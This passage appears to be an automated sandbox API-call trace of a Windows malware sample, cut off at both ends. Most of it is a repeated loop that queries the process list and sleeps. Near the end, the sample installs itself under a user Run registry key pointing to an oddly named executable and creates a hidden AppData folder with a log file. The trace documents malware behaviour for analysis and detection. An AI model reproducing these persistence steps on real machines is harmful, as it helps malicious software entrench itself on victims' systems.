BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0244.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0245.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.024] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0245.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0245.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.027] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0245.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0245.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0245.169] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.169] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0245.171] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0245.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.173] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0245.173] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0245.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0245.289] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.290] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0245.292] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0245.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0245.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0245.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0245.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.401] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0245.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0245.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0245.404] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0245.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0245.570] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.571] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0245.573] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0245.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0245.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0245.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0245.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.722] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0245.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0245.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0245.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0245.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0245.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.868] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0245.869] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0245.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.870] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0245.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0245.871] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0246.005] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.006] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0246.008] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0246.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0246.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0246.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0246.150] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.151] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0246.153] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0246.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0246.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0246.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0246.304] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.305] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0246.307] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0246.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.309] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0246.309] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0246.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0246.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.452] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0246.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0246.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0246.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0246.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0246.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.615] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0246.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0246.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0246.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0246.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0246.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.759] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0246.762] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0246.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.763] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0246.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0246.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0247.031] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.032] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0247.034] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xdea4c | out: TokenHandle=0xdea4c*=0x390) returned 0x0 [0247.034] NtQueryInformationToken (in: TokenHandle=0x390, TokenInformationClass=0x14, TokenInformation=0xdea44, TokenInformationLength=0x4, ReturnLength=0xdea48 | out: TokenInformation=0xdea44, ReturnLength=0xdea48) returned 0x0 [0247.034] NtClose (Handle=0x390) returned 0x0 [0247.049] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea1c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.049] NtCreateFile (in: FileHandle=0xdea3c, DesiredAccess=0x12019f, ObjectAttributes=0xdea04*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea24, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea3c*=0x0, IoStatusBlock=0xdea24*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0247.049] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x58ec90) returned 1 [0247.049] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea0c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.049] NtCreateFile (in: FileHandle=0xdea2c, DesiredAccess=0x120089, ObjectAttributes=0xde9f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea14, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea2c*=0x0, IoStatusBlock=0xdea14*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0247.050] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x58eb10) returned 1 [0247.052] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xde61c | out: TokenHandle=0xde61c*=0x390) returned 0x0 [0247.052] NtQueryInformationToken (in: TokenHandle=0x390, TokenInformationClass=0x1, TokenInformation=0xdde14, TokenInformationLength=0x400, ReturnLength=0xde614 | out: TokenInformation=0xdde14, ReturnLength=0xde614) returned 0x0 [0247.052] ConvertSidToStringSidW (in: Sid=0xdde1c*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0xde618 | out: StringSid=0xde618*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0247.053] NtClose (Handle=0x390) returned 0x0 [0247.056] NtCreateKey (in: KeyHandle=0xdea54, DesiredAccess=0x2021f, ObjectAttributes=0xde618*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea54*=0x390) returned 0x0 [0247.071] NtSetValueKey (in: KeyHandle=0x390, ValueName="TDKXEFWX2TVX", TitleIndex=0x0, Type=0x1, Data="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", DataSize=0x68 | out: Data="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe") returned 0x0 [0247.074] NtClose (Handle=0x390) returned 0x0 [0247.074] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.074] NtCreateFile (in: FileHandle=0xdea40, DesiredAccess=0x12019f, ObjectAttributes=0xdea08*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea28, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x1, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea40*=0x0, IoStatusBlock=0xdea28*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0247.074] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x58ec90) returned 1 [0247.074] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea10, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.074] NtCreateFile (in: FileHandle=0xdea30, DesiredAccess=0x120089, ObjectAttributes=0xde9f8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea18, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea30*=0x0, IoStatusBlock=0xdea18*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0247.074] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x58ee10) returned 1 [0247.074] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E", NtPathName=0xdea30, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.074] NtCreateFile (in: FileHandle=0xdea50, DesiredAccess=0x100181, ObjectAttributes=0xdea18*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea38, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x21, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea50*=0x390, IoStatusBlock=0xdea38*(Status=0x0, Pointer=0x0, Information=0x2)) returned 0x0 [0247.075] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5c2f48) returned 1 [0247.075] NtQueryInformationFile (in: FileHandle=0x390, IoStatusBlock=0xdea38, FileInformation=0xde9d8, Length=0x28, FileInformationClass=0x4 | out: IoStatusBlock=0xdea38, FileInformation=0xde9d8) returned 0x0 [0247.080] NtSetInformationFile (FileHandle=0x390, IoStatusBlock=0xdea38, FileInformation=0xde9d8, Length=0x28, FileInformationClass=0x4) returned 0x0 [0279.591] NtClose (Handle=0x390) returned 0x0 [0279.616] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog.ini", NtPathName=0xdea20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.637] NtCreateFile (in: FileHandle=0xdea40, DesiredAccess=0x12019f, ObjectAttributes=0xdea08*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea28, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea40*=0x390, IoStatusBlock=0xdea28*(Status=0x0, Pointer=0x0, Information=0x2)) returned 0x0 [0279.639] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b3248) returned 1 [0279.639] NtClose (Handle=0x390) returned 0x0 [0279.655] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xde3b8 | out: TokenHandle=0xde3b8*=0x390) returned 0x0 [0279.655] NtQueryInformationToken (in: TokenHandle=0x390, TokenInformationClass=0x1, TokenInformation=0xddbb0, TokenInformationLength=0x400, ReturnLength=0xde3b0 | out: TokenInformation=0xddbb0, ReturnLength=0xde3b0) returned 0x0 [0279.655] ConvertSidToStringSidW (in: Sid=0xddbb8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0xde3b4 | out: 